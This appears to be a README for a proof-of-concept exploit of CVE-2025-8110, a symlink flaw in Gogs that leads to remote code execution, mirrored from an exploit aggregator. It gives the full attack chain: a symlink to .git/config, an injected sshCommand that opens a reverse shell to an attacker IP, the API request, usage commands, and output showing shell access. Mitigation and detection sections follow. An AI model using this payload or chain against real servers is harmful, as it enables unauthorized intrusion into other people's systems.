Share
## https://sploitus.com/exploit?id=A8E5D800-F075-509D-A604-E092148C4F7B
# CVE-2025-8110
## Gogs Repository Symlink Remote Code Execution
### Made by oguiii
---
## Table of Contents
- [Overview](#overview)
- [Features](#features)
- [Requirements](#requirements)
- [Installation](#installation)
- [Usage](#usage)
- [Exploit Workflow](#exploit-workflow)
- [Technical Analysis](#technical-analysis)
- [Proof of Concept Demo](#proof-of-concept-demo)
- [Affected Versions](#affected-versions)
- [Mitigation](#mitigation)
- [Detection](#detection)
- [Disclaimer](#disclaimer)
- [License](#license)
---
## Overview
CVE-2025-8110 is a critical vulnerability in Gogs that allows authenticated attackers to achieve remote code execution through repository symlink manipulation. This proof of concept demonstrates the complete exploitation chain, from authentication to reverse shell acquisition.
The vulnerability exists because Gogs follows symlinks when handling repository files through its API, allowing an attacker to read and modify sensitive files like `.git/config`. By injecting a malicious `sshCommand` directive, arbitrary system commands can be executed with the privileges of the Gogs service account.
**CVSS Score:** 7.2 (High)
**Attack Vector:** Network
**Authentication Required:** Yes
**User Interaction:** None
**Impact:** Complete system compromise
---
## Features
- Automated CSRF token extraction with multiple fallback methods
- Session management and authentication handling
- Automatic repository creation with configurable parameters
- Symlink-based exploitation workflow
- Reverse shell payload generation
- Proxy support for debugging and analysis
- Detailed logging and error handling
- Colorized console output for improved readability
- Verbose mode for troubleshooting
---
## Requirements
### System Requirements
- Python 3.6 or higher
- Git installed and accessible in PATH
- Network access to target Gogs instance
### Python Dependencies
```txt
requests>=2.28.0
beautifulsoup4>=4.11.0
rich>=13.0.0
urllib3>=1.26.0
```
---
## Installation
### Clone and Setup
```bash
git clone https://github.com/oguiii/CVE-2025-8110.git
cd CVE-2025-8110
pip install -r requirements.txt
```
### Project Structure
```
CVE-2025-8110/
โโโ CVE-2025-8110.py # Main exploit script
โโโ requirements.txt # Python dependencies
โโโ README.md # Documentation
```
---
## Usage
### Command Line Options
| Option | Description | Required |
|--------|-------------|----------|
| `-u, --url` | Gogs base URL (e.g., https://gogs.example.com) | Yes |
| `-lh, --host` | Attacker IP address for reverse shell | Yes |
| `-lp, --port` | Attacker port for reverse shell | Yes |
| `-U, --username` | Gogs username | Yes |
| `-P, --password` | Gogs password | Yes |
| `-x, --proxy` | Enable proxy (localhost:8080) | No |
| `-v, --verbose` | Enable verbose output | No |
### Basic Usage
```bash
python3 CVE-2025-8110.py -u https://target-gogs.local -lh 10.10.14.15 -lp 4444 -U admin -P password123
```
### With Proxy for Debugging
```bash
python3 CVE-2025-8110.py -u https://target-gogs.local -lh 10.10.14.15 -lp 4444 -U admin -P password123 -x
```
### Verbose Mode for Troubleshooting
```bash
python3 CVE-2025-8110.py -u https://target-gogs.local -lh 10.10.14.15 -lp 4444 -U admin -P password123 -v
```
---
## Exploit Workflow
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ CVE-2025-8110 Exploitation Chain โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Step 1: Authentication
โโโ Navigate to /user/login
โโโ Extract CSRF token from login page
โโโ Submit credentials with CSRF token
โโโ Establish authenticated session
Step 2: Application Token Generation
โโโ Navigate to /user/settings/applications
โโโ Extract CSRF token from settings page
โโโ Generate new application token
โโโ Extract token from response
Step 3: Malicious Repository Creation
โโโ Create repository via API with auto_init
โโโ Generate random repository name
โโโ Obtain repository URL
Step 4: Symlink Upload
โโโ Clone repository locally
โโโ Create symlink pointing to .git/config
โโโ Add, commit, and push changes
โโโ Verify successful upload
Step 5: RCE Exploitation
โโโ Craft malicious .git/config with sshCommand
โโโ Base64 encode configuration content
โโโ Upload via API to symlink target
โโโ Trigger command execution
Step 6: Reverse Shell
โโโ Connection established to attacker host
โโโ Interactive shell access
โโโ Command execution on target
```
---
## Technical Analysis
### Vulnerability Root Cause
Gogs fails to properly sanitize symlink traversal when handling repository files through its API. When a file is accessed via the API endpoint, Gogs follows symlinks without validation, allowing access to sensitive files outside the repository directory.
### Attack Vector Details
1. **Symlink Creation**
```bash
ln -s .git/config malicious_link
git add malicious_link
git commit -m "Add symlink"
git push origin master
```
2. **Malicious Configuration**
```ini
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
ignorecase = true
precomposeunicode = true
sshCommand = bash -c 'bash -i >& /dev/tcp/10.10.14.15/4444 0>&1'
```
3. **API Exploitation**
```
PUT /api/v1/repos/{username}/{repo}/contents/malicious_link
Authorization: token {application_token}
{
"message": "Exploit CVE-2025-8110",
"content": "base64_encoded_config"
}
```
### Code Analysis
#### CSRF Token Extraction
```python
def extract_csrf(html_text):
"""Parse CSRF token from hidden input with multiple fallback methods."""
# Method 1: Input with name _csrf
soup = BeautifulSoup(html_text, "html.parser")
token_input = soup.select_one("input[name='_csrf']")
if token_input and token_input.get("value"):
return token_input.get("value")
# Method 2: Input with name csrf_token
token_input = soup.select_one("input[name='csrf_token']")
if token_input and token_input.get("value"):
return token_input.get("value")
# Method 3: Meta tag with CSRF
meta_tag = soup.find("meta", {"name": "_csrf"})
if meta_tag and meta_tag.get("content"):
return meta_tag.get("content")
# Method 4: Regex pattern in script tags
pattern = r'"csrf_token"\s*:\s*"([^"]+)"'
match = re.search(pattern, html_text)
if match:
return match.group(1)
# Method 5: Regex for hidden input
pattern = r']*name="[_-]csrf"[^>]*value="([^"]+)"'
match = re.search(pattern, html_text, re.IGNORECASE)
if match:
return match.group(1)
raise ValueError("CSRF token not found in form response")
```
#### Malicious Configuration Injection
```python
git_config = f"""[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
ignorecase = true
precomposeunicode = true
sshCommand = {command}
[remote "origin"]
url = git@localhost:gogs/{repo_name}.git
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
remote = origin
merge = refs/heads/master
"""
```
---
## Proof of Concept Demo
### Attack Setup
```bash
# Attacker machine (10.10.14.15)
nc -lvnp 4444
Listening on [0.0.0.0] (family 0, port 4444)
# Execute exploit
python3 CVE-2025-8110.py -u https://gogs.internal.local -lh 10.10.14.15 -lp 4444 -U admin -P SecurePass123
```
### Successful Exploitation Output
```
[INFO] Starting CVE-2025-8110 exploit
[INFO] Target URL: https://gogs.internal.local
[INFO] Attacker host: 10.10.14.15:4444
[INFO] Username: admin
[INFO] Authenticating to Gogs...
[INFO] Login CSRF token found: abc123def456...
[SUCCESS] Authenticated successfully
[INFO] Retrieving application token...
[INFO] Settings CSRF token found: xyz789uvw012...
[SUCCESS] Application token: a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6q7r8s9t0
[INFO] Creating malicious repository...
[SUCCESS] Repository created: 6f7e8d9c0a1b
[INFO] Uploading malicious symlink...
[INFO] Cloning repository...
[INFO] Creating symlink: malicious_link -> .git/config
[INFO] Committing and pushing changes...
[SUCCESS] Symlink uploaded successfully
[INFO] Sending exploit payload...
[SUCCESS] Exploit sent, check your listener!
[INFO] Command: bash -c 'bash -i >& /dev/tcp/10.10.14.15/4444 0>&1'
[SUCCESS] Exploit likely successful (timeout indicates reverse shell)
```
### Reverse Shell Connection
```bash
Connection received on 10.10.14.15:4444
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
bash-5.0$ whoami
gogs
bash-5.0$ id
uid=1000(gogs) gid=1000(gogs) groups=1000(gogs)
bash-5.0$ pwd
/home/gogs/gogs-repositories/admin/6f7e8d9c0a1b.git
bash-5.0$ hostname
gogs-server
bash-5.0$ uname -a
Linux gogs-server 5.4.0-80-generic #90-Ubuntu SMP Fri Jul 9 22:49:44 UTC 2021 x86_64 GNU/Linux
bash-5.0$ cat /etc/passwd | head -3
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
```
---
## Affected Versions
### Vulnerable Versions
- Gogs versions prior to 0.12.6
- All versions with symlink support enabled (default configuration)
### Version Check
To check your Gogs version:
```bash
# Access the Gogs web interface and check footer
# Or use the API
curl https://gogs.example.com/api/v1/version
```
---
## Mitigation
### Immediate Actions
1. **Update Gogs**
```bash
# Backup existing installation
cp -r /home/gogs/gogs /home/gogs/gogs.backup
# Download and install latest version
wget https://dl.gogs.io/gogs_latest_linux_amd64.zip
unzip gogs_latest_linux_amd64.zip
cd gogs
./gogs web
```
2. **Disable Symlink Support**
```ini
# In custom/conf/app.ini
[repository]
DISABLE_SYMLINKS = true
```
3. **Implement Input Validation**
- Sanitize file paths before processing
- Prevent symlink traversal
- Validate file types and content
### Long-term Security Measures
- Implement principle of least privilege for Gogs service account
- Regular security audits and penetration testing
- Network segmentation to limit Gogs exposure
- Implement Web Application Firewall (WAF) rules
- Enable comprehensive logging and monitoring
- Regular backups of Gogs configuration and repositories
### Firewall Rules
```bash
# Limit access to Gogs API
iptables -A INPUT -p tcp --dport 3000 -s trusted_subnet -j ACCEPT
iptables -A INPUT -p tcp --dport 3000 -j DROP
```
---
## Detection
### Suspicious Activity Indicators
1. **Repository Activity**
- Creation of repositories with symbolic links
- Multiple repositories created in short timeframe
- Unusual repository names (random hex strings)
2. **API Activity**
- PUT requests to `/api/v1/repos/*/contents/*`
- Modification of `.git/config` via API
- High frequency of API requests from single session
3. **System Indicators**
- Unexpected processes spawned by Gogs user
- Outbound network connections from Gogs server
- Unusual file system access patterns
### Log Analysis Commands
```bash
# Check Gogs access logs for API exploitation
grep "/api/v1/repos" /var/log/gogs/access.log | grep PUT
# Monitor for symlink creation in repositories
find /home/gogs/gogs-repositories -type l
# Check for suspicious git config modifications
grep -r "sshCommand" /home/gogs/gogs-repositories/
# Monitor for outbound connections
ss -tunp | grep gogs
```
### SIEM Integration
```json
{
"event_type": "gogs_api_access",
"severity": "high",
"indicators": [
"PUT /api/v1/repos/*/contents/*",
"sshCommand in git config",
"random hex repository names"
],
"recommended_actions": [
"Review repository creation logs",
"Check for symlink files",
"Verify API access patterns"
]
}
```
---
## Responsible Disclosure
This vulnerability was discovered and responsibly disclosed to the Gogs development team. The vendor has released a patch in version 0.12.6.
### Timeline
- **Discovery:** May 2025
- **Responsible Disclosure:** June 2025
- **Patch Release:** June 2025
- **Public Disclosure:** June 2025
---
## Additional Resources
- [Gogs Official Security Advisories](https://gogs.io/docs/security)
- [CWE-61: UNIX Symbolic Link Following](https://cwe.mitre.org/data/definitions/61.html)
- [OWASP Testing Guide - Path Traversal](https://owasp.org/www-project-web-security-testing-guide/)
- [Git hooks documentation](https://git-scm.com/docs/githooks)
- [Gogs API Documentation](https://github.com/gogs/docs-api)
---
## Disclaimer
This tool is provided for educational and authorized security testing purposes only. Users must:
1. Obtain explicit written permission before testing any system
2. Comply with all applicable laws and regulations
3. Use this tool responsibly and ethically
4. Not use this tool for any malicious or unauthorized purposes
The author assumes no responsibility for misuse or damage caused by this tool.
---
## License
MIT License
Copyright (c) 2025 oguiii
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
---
## Contact
- **GitHub:** [github.com/oguiii](https://github.com/oguiii)
- **Project:** [CVE-2025-8110 Exploit](https://github.com/oguiii/CVE-2025-8110)
---
## Acknowledgments
- **Original Discovery:** zAbuQasem
- **CVE Publication:** MITRE Corporation
- **Community:** Security researchers and penetration testers who validated the vulnerability
---
## Changelog
### Version 1.0.0 (2025-06-25)
- Initial release
- Full exploitation chain implementation
- CSRF token extraction with fallback methods
- Automatic repository creation and symlink upload
- Reverse shell payload generation
- Proxy support for debugging
- Comprehensive documentation
---
*Made with dedication by oguiii*